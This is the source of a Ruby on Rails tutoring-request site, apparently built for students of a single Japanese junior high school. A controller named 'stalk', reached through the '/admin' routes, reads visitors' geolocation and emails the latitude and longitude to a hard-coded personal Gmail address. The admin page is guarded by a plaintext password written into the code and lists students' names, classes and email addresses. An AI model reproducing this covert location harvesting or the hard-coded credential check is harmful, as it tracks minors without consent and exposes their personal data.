config/routes.rb
Rails.application.routes.draw do
  get 'stalk/index'

  get 'survice/index'

  get 'new_teacher/index'

  get 'admins/index'

  resources :homerooms
  get 'homerooms', to: 'homerooms#index'
  get 'homerooms/index'
  get 'intros', to: 'intro#index'
  get 'intros/index'
  get 'admins', to: 'stalk#index'
  get 'admin', to: 'stalk#index'
  get 'new_teacher', to: 'new_teacher#index'
  get 'new_teacher/index'
  get 'survice', to: 'survice#index'
  get 'survice/index'
  get 'stalk', to: 'stalk#index'
  get 'stalk/index'
  post 'stalk/get_result', to: 'stalk#get_result'
  post 'stalk/get_result'  
  post 'admins/index', to: 'admins#index'
  post 'admins/index'  
  post 'homerooms/new_lesson'
  post 'homerooms/new_lesson', to: 'homerooms#new_lesson'
  post 'new_teacher/newer'
  post 'new_teacher/newer', to: 'new_teacher#newer'
  get '*unmatched_route', to: 'application#render_404'
end

app/models/homeroom.rb
class Homeroom < ActiveRecord::Base
end

app/controllers/admins_controller.rb
class AdminsController < ApplicationController
  protect_from_forgery
  def index
    if request.post? then
      @passwords = params['pass']
      @admin = "off"
      if @passwords == 'rikut0827' 
        @admin = "on"
        @homeroom = Homeroom.all
      else
        @admin = "off_wait"
      end
    else
      @admin = "off"
    end
  end
  
end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  # Prevent CSRF attacks by raising an exception.
  # For APIs, you may want to use :null_session instead.
  protect_from_forgery with: :exception
  rescue_from ActionView::MissingTemplate, with: :render_404
  def render_404
    render template: 'errors/error404', status: 404
  end
end

app/controllers/homerooms_controller.rb
require 'uri'
class HomeroomsController < ApplicationController
  # before_action :set_homeroom, only: [:show, :edit, :update, :destroy]
  protect_from_forgery

  # GET /homerooms
  # GET /homerooms.json
  def index
    # @homeroom = Homeroom.all
  end
  
  def show
    # @homeroom = Homeroom.all
  end
  
  def new_lesson
    @name = params['name']
    @sets = params['list']
    @mail_adress = params['mail']
    if @name.empty?
      @name = "匿名"
    end
    # @comments = params['comment']
    # @date = params['date']
    # x = Homeroom.new(:name => @name, :set => @sets, :mail => @mail_adress, :student => "true", :dating => @date, :comments => @comments);
    # x = Homeroom.new(:name => @name, :set => @sets, :mail => @mail_adress, :student => "true");
    # x.save
    TestMailer.sender(@mail_adress, @name, @sets).deliver
    redirect_to :action => "index"
  end

end

app/controllers/intro_controller.rb
class IntroController < ApplicationController
  def index
  end
end

app/controllers/new_teacher_controller.rb
class NewTeacherController < ApplicationController
  protect_from_forgery
  def index
    
  end
  
  def newer
    @name = params['name']
    @sets = params['list']
    @mail_adress = params['mail']
    @comments = params['comment']
    x = Homeroom.new(:name => @name, :set => @sets, :mail => @mail_adress, :student => "false", :comments => @comments);
    x.save
    redirect_to "/homerooms/"  
  end
end

app/controllers/stalk_controller.rb
class StalkController < ApplicationController
  protect_from_forgery
  def index
    
  end
  
  def get_result
    puts "afjaifandifonaiofnofnioadsnfonfonfbnuofnuabguoabfouadf"
    @where1 = params['results1']
    @where2 = params['results2']
    puts "緯度は" + @where1
    puts "経度は" + @where2
    TestMailer.sender("ninja8rrrr@gmail.com", @where1, @where2).deliver
    redirect_to "/homerooms/"  
  end
end

app/controllers/survice_controller.rb
class SurviceController < ApplicationController
  def index
  end
end

app/helpers/admins_helper.rb
module AdminsHelper
end

app/helpers/application_helper.rb
module ApplicationHelper
end

app/helpers/homerooms_helper.rb
module HomeroomsHelper
end

app/helpers/intro_helper.rb
module IntroHelper
end

app/helpers/new_teacher_helper.rb
module NewTeacherHelper
end

app/helpers/stalk_helper.rb
module StalkHelper
end

app/helpers/survice_helper.rb
module SurviceHelper
end

app/views/admins/index.html.erb
<% if @admin == "on" %>
    <h1>This is admin page.</h1>
<div class="col-lg-11" id="list-group2">
            <table  class="table table-bordered table-hover">
                <thead>
                    <tr>
                        <th>番号</th>
                        <th>名前</th>
                        <th>クラス</th>
                        <th>メールアドレス</th>
                        <th>希望日時</th>
                        <th>コメント</th>
                        <th>生徒か教師か</th>
                    </tr>
                </thead>
                <tbody>
                    <% @homeroom.each do |questions| %>
                        <tr>
                            <td><%= questions.id %></td>
                            <td><%= questions.name %></td>
                            <td><%= questions.set %></td>
                            <td><%= questions.mail %></td>
                            <td><%= questions.dating %></td>
                            <td><%= questions.comments %></td>
                            <% if questions.student == "true" %>
                                <td>生徒</td>
                            <% else %>
                                <td>教師希望</td>
                            <% end %>
                        </tr>
                    <% end %>
                </tbody>
            </table>
</div>
<% elsif @admin == "off" %>
    <form action="/admins/index" method="post" style = "text-align:center;">
        <input type = "password" name = "pass" class="form-control input-lg" placeholder="パスワードを入力">
    </form>
<% elsif @admin == "off_wait" %>
<div class="col-lg-11" id="list-group2">
            <table  class="table table-bordered table-hover">
                <thead>
                    <tr>
                        <th>番号</th>
                        <th>名前</th>
                        <th>クラス</th>
                        <th>メールアドレス</th>
                        <th>希望日時</th>
                        <th>コメント</th>
                        <th>生徒か教師か</th>
                    </tr>
                </thead>
                <tbody>
                        <tr>
                            <td>0</td>
                            <td>田中龍之介</td>
                            <td>6</td>
                            <td>@gmail.com</td>
                            <td>2017/12/6</td>
                            <td>test</td>
                            <td>生徒</td>
                        </tr>
                </tbody>
            </table>
</div>
<% end %>

app/views/homerooms/_form.html.erb
<%= form_for(@homeroom) do |f| %>
  <% if @homeroom.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@homeroom.errors.count, "error") %> prohibited this homeroom from being saved:</h2>

      <ul>
      <% @homeroom.errors.full_messages.each do |message| %>
        <li><%= message %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="field">
    <%= f.label :name %><br>
    <%= f.text_field :name %>
  </div>
  <div class="field">
    <%= f.label :class %><br>
    <%= f.number_field :class %>
  </div>
  <div class="field">
    <%= f.label :mail %><br>
    <%= f.text_field :mail %>
  </div>
  <div class="field">
    <%= f.label :student %><br>
    <%= f.text_field :student %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

app/views/homerooms/edit.html.erb
<h1>Editing Homeroom</h1>

<%= render 'form' %>

<%= link_to 'Show', @homeroom %> |
<%= link_to 'Back', homerooms_path %>

app/views/homerooms/index.html.erb
<a href="/homerooms/new"><%= image_tag("sub_title0.png",id: "sub_title") %></a>
<div class="button">
    <ul>
        <li><a href="/homerooms/new">授業申し込み</a></li>
        <li><a href="/intros">このサイトについて</a></li>
        <li><a href="#"><s>Coming Soon</s></a></li>
        <!--<li><a href="/new_teacher">教師になりませんか？</a></li>-->
        <!--<li><a href="/survice">出張サービス</a></li>-->
    </ul>
</div>
<br><hr>
<dl id="result"></dl>
<script type="text/javascript">

</script>

app/views/homerooms/intro.html.erb
<div class="button">
    <ul>
        <li><a href="/homerooms/new">授業申し込み</a></li>
        <li><a href="/homerooms/admin">このサイトについて</a></li>
        <li><a href="#">教師になりませんか？</a></li>
    </ul>
</div>
<br><hr>

app/views/homerooms/new.html.erb
<h1 class = "page-header">新規授業申し込み</h1>
<div class="container">
    <br>
    <form action="/homerooms/new_lesson" method="post">
        <div class="controls">
            <div class="form-group">
                <h2>氏名を入力してください。</h2>
                <p>※匿名も可（空白のまま申し込みください。）</p>
                <input type="text" name="name" placeholder="氏名" class="form-control input-lg" ><br>
                <h2>組を選択してください。</h2>
                <select name="list" class="form-control" required>
                        <option value="1">1組</option>
                        <option value="2">2組</option>
                        <option value="3">3組</option>
                        <option value="4">4組</option>
                        <option value="5">5組</option>
                        <option value="6">6組</option>
                        <option value="7">7組</option>
                </select><br>
                <h2>メールアドレスを入力してください。</h2>
                <input type="email" placeholder="例：taro@kmail.com" class="form-control input-lg" required><br>
                <!--<h2>希望日時を選択してください。</h2>-->
                <h2>もう一度入力してください。</h2>
                <input type="email" name="mail" placeholder="例：taro@kmail.com" class="form-control input-lg" required><br>
                <!--<input type="date" name="date" class="form-control input-lg" required><br>-->
                <!--<h2>簡単な質問内容を入力してください。</h2>-->
                <!--<textarea name="comment" placeholder="例：二次方程式がわからない" class="form-control input-lg" required></textarea><br>-->
            </div>
            <div class="form-group col-lg-4">
                <input type="submit" value="申し込む" class="form-control col-lg-4" onclick = "before_sending()">
            </div>
        </div>
    </form>
</div>
<script>
    function before_sending(){
        alert("メールを送信しました。登録したメールアドレスの受信箱を確認してください。");
    }
</script>

app/views/homerooms/show.html.erb
<h1>このページは表示されません。ホームにお戻りください。</h1>    
<br>
<div class="button" style="text-align:center;">
    <ul>
        <li><a href="/homerooms">ホームに戻る</a></li>
    </ul>
</div>
<hr>

app/views/intro/index.html.erb
<div class="jumbotron">
    <div class="page-header"><h1>このサイトについて</h1></div>
    <p>当サイトは、安全かつ身近な存在であることを特徴としたサイトです。
    <br><br>またこのサービスは町田一中生専用となっております。
    <br><br>簡単な登録を済ませていただければ、質問要望を早ければ1日以内に返答いたします（＾ω＾）
    <br><br>しかし、これはみなさんが答を導き出し、理解するまでの手助けをするものであり、答を全て教えるものではありません。
    <br><br>また、みなさんの成績を保証するものではありません。
    </p>
    <br><br><h1>このサイトの使い方</h1>
    <h2>・新規授業申し込み</h2>
    <p>
    申し込みフォームから名前、組、メールアドレスや電話番号、LINEのIDなどを登録していただくと、運営側から返信いたします。
    <br><br>一度登録していただくと何度でもSNSを利用して質問などを利用できます。
    <br><br><br>今後も新しいサービスを展開していきます。
    </p>
    <p>
        <br><br><a href = "/homerooms/new">質問や要望はこちらから</a>
    </p>
</div>

app/views/layouts/application.html.erb
<!DOCTYPE html>
<html>
<head>
  
  <title>N.H.R.</title>
  <%= stylesheet_link_tag    'application', media: 'all', 'data-turbolinks-track' => true %>
  <%= javascript_include_tag 'application', 'data-turbolinks-track' => true %>
  <%= csrf_meta_tags %>
</head>
<body>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <!-- Optional theme --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"> <!-- Latest compiled and minified JavaScript --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
	<nav class="navbar navbar-inverse">
	    <div class="container">
	        <div class="navbar-header" style = "height:110px;">
	            <a href="/homerooms" class="navbar-brand"><%= image_tag("title0.png",margin: "auto")%>&emsp;&emsp;- New Home Room - </a>
	        </div>
	        <ul class="nav navbar-nav navbar-right" style = "top:50px;font-size:120%;">
	        		<li><a href="/homerooms/new">新規授業申し込み</a></li>
	            <li><a href="/intros">このサイトについて</a></li>
	            <!--<li><a href="/survice">出張サービス</a></li>-->
	            <!--<li><a href="/new_teacher">教師になりませんか？</a></li>-->
	            <li><a href="#"><s>Coming Soon</s></a></li>
	        </ul>
	    </div>
	</nav>
<%= yield %>
</body>
</html>

app/views/new_teacher/index.html.erb
<h1 class = "page-header">教師申請</h1>
<div class="container">
    <br>
    <form action="/new_teacher/newer" method="post">
        <div class="controls">
            <div class="form-group">
                <h2>氏名を入力してください。</h2>
                <input type="text" name="name" placeholder="氏名" class="form-control input-lg" required><br>
                <h2>組を選択してください。</h2>
                <select name="list" class="form-control" required>
                        <option value="1">1組</option>
                        <option value="2">2組</option>
                        <option value="3">3組</option>
                        <option value="4">4組</option>
                        <option value="5">5組</option>
                        <option value="6">6組</option>
                        <option value="7">7組</option>
                </select><br>
                <h2>メールアドレスを入力してください。</h2>
                <input type="email" name="mail" placeholder="例：taro@kmail.com" class="form-control input-lg" required><br>
                <h2>志望理由を入力してください。</h2>
                <textarea name="comment" placeholder="例：教えるのが好きだから" class="form-control input-lg" required></textarea><br>
            </div>
            <div class="form-group col-lg-4">
                <input type="submit" value="申し込む" class="form-control col-lg-4">
            </div>
        </div>
    </form>
</div>

app/views/stalk/index.html.erb
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<title>HTML5 TIPS</title>
<script>
window.addEventListener('DOMContentLoaded',
  function() {
    // 結果の表示先（<div>要素）を取得
    var latitude = document.querySelector('#latitude');
    var longitude = document.querySelector('#longitude');
    var heading = document.querySelector('#heading');
    var stop = document.querySelector('#stop');
    // Geolocation APIが利用できるかを判定
    if (navigator.geolocation) {
      // 現在の位置情報を定期的に取得
      var id = navigator.geolocation.watchPosition(
        // 位置情報の取得に成功した場合の処理
        function(pos) {
          latitude.innerHTML = pos.coords.latitude;
          longitude.innerHTML = pos.coords.longitude;
          heading.innerHTML = pos.coords.heading;
        },
        // 位置情報の取得に失敗した場合の処理
        function(err) {
          var msgs = [
            err.message,
            '位置情報の取得を許可されていません。',
            '位置情報の取得に失敗しました。',
            '位置情報を取得中にタイムアウトしました。'
          ];
          window.alert(msgs[err.code]);
        },
        // 位置取得の動作オプションを設定
        {
          timeout : 10000,
          maximumAge : 0,
          enableHighAccuracy: true
        }
      );
    } else {
      window.alert('Geolocation API対応ブラウザでアクセスしてください。');
    }
  }, false
);
</script>
</head>
<body>
<!--Geolocation APIで取得した位置情報を表示-->
<ul>
  <li>経度：<span id="latitude"></span></li>
  <li>緯度：<span id="longitude"></span></li>
  <li>方角：<span id="heading"></span></li>
</ul>
...中略...
</body>
</html>

app/views/survice/index.html.erb
<h1 class = "page-header">出張サービス</h1>
<div class="jumbotron">
    <div class="page-header"><h1>出張サービスについて</h1></div>
    <p>
    <br><br>理解を更に深めたい場合は私達が出動します(*ﾟ▽ﾟ*)
    <br><br>その場その問題に臨機応変に対応します。
    <br><br>
    <br><br>質問などはこちらに<a href = "mailto:ninja8rrrr@gmail.com">〇〇〇〇@gmail.com</a>
    </p>
</div>
<div class="container">
    <br>
    <form action="/homerooms/new_lesson" method="post">
        <div class="controls">
            <div class="form-group">
                <h2>氏名を入力してください。</h2>
                <input type="text" name="name" placeholder="氏名" class="form-control input-lg" required><br>
                <h2>組を選択してください。</h2>
                <select name="list" class="form-control" required>
                        <option value="1">1組</option>
                        <option value="2">2組</option>
                        <option value="3">3組</option>
                        <option value="4">4組</option>
                        <option value="5">5組</option>
                        <option value="6">6組</option>
                        <option value="7">7組</option>
                </select><br>
                <h2>メールアドレスを入力してください。</h2>
                <input type="email" name="mail" placeholder="例：taro@kmail.com" class="form-control input-lg" required><br>
                <h2>希望する場所を入力してください。</h2>
                <textarea name="comment" placeholder="例：図書館,または東京都町田市金森１１６１のように" class="form-control input-lg" required></textarea><br>
                <h2>希望日時を選択してください。</h2>
                <input type="date" name="date" class="form-control input-lg" required><br>
                <h2>大まかな質問内容を入力してください。</h2>
                <textarea name="comment" placeholder="例：数学" class="form-control input-lg" required></textarea><br>
                <h2>指導体制を選択してください。</h2>
                <select name="list_teacher" class="form-control" required>
                        <option value="なんでも">なんでも</option>
                        <option value="男性">男性</option>
                        <option value="女性">女性</option>
                </select><br>
            </div>
            <div class="form-group col-lg-4">
                <input type="submit" value="申し込む" class="form-control col-lg-4">
            </div>
        </div>
    </form>
</div>